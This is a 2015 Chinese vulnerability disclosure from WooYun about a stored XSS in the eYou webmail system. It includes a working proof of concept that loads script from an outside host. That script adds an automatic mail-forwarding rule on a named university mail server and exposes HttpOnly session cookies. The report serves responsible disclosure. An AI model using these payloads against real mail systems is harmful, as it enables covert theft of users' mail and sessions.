当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095260

漏洞标题:eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)

相关厂商:北京亿中邮信息技术有限公司

漏洞作者: retanoj

提交时间:2015-02-02 19:06

修复时间:2015-03-19 19:08

公开时间:2015-03-19 19:08

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-04: 厂商已经确认,细节仅向厂商公开
2015-02-14: 细节向核心白帽子及相关领域专家公开
2015-02-24: 细节向普通白帽子公开
2015-03-06: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

新玩意儿,影响Chrome。
在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏,导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。

详细说明:

新玩意儿,影响Chrome。
在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏,导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。内有POC
(wooyun上有一些关于eyou邮件正文型XSS的报告,你们给的回应全都是“已有解决方案”、“问题已知,谢谢报告”。然而测试了几所大学的邮件系统,全都没修复,感觉你们是在逗我.....)

漏洞证明:

发邮件,Burpsuite拦截,content_html插入一句HTML
<link rel="import" href="http://www.129.cc/x.php"> (网站是我本地测试用的,x.php自己可控)

2post.jpg


1.打开邮件自动设置自动转寄地址POC。

http://www.129.cc/x.php
<html>
<?php header("Access-Control-Allow-Origin: *"); ?> //关键点,允许跨域
<script>
//设置自动转寄
var url = "http://mail.bit.edu.cn/user/?q=settings.forward.do&zid=";
var zid = parent.gZid;
var data = "[email protected]&is_save=1&is_opened=1&action=add";
var xhr = new XMLHttpRequest();
xhr.open("POST", url+zid, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(data);
</script>
</html>


刷新网站,截图证明

2get.jpg


2get-2.jpg


2.获取HTTPOnly Cookie
不多说,你们把所有Cookie写在打开邮件后的form里,简直不能理解。截图证明
获取EMPHPSID POC

http://www.129.cc/x.php
<?php header("Access-Control-Allow-Origin: *"); ?>
<script>console.log(parent.document.getElementsByTagName('html')[0].innerHTML);</script>


2get-3.jpg

修复方案:

虽说只影响Chrome浏览器,但请考虑该浏览器用户群和rel=import的趋势。结合如上两点,希望贵厂谨慎修复,谢谢。

版权声明:转载请注明来源 retanoj@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-02-04 15:25

厂商回复:

已出解决方案,会根据客户情况逐步联系并进行修补,非常感谢提供!

最新状态:

暂无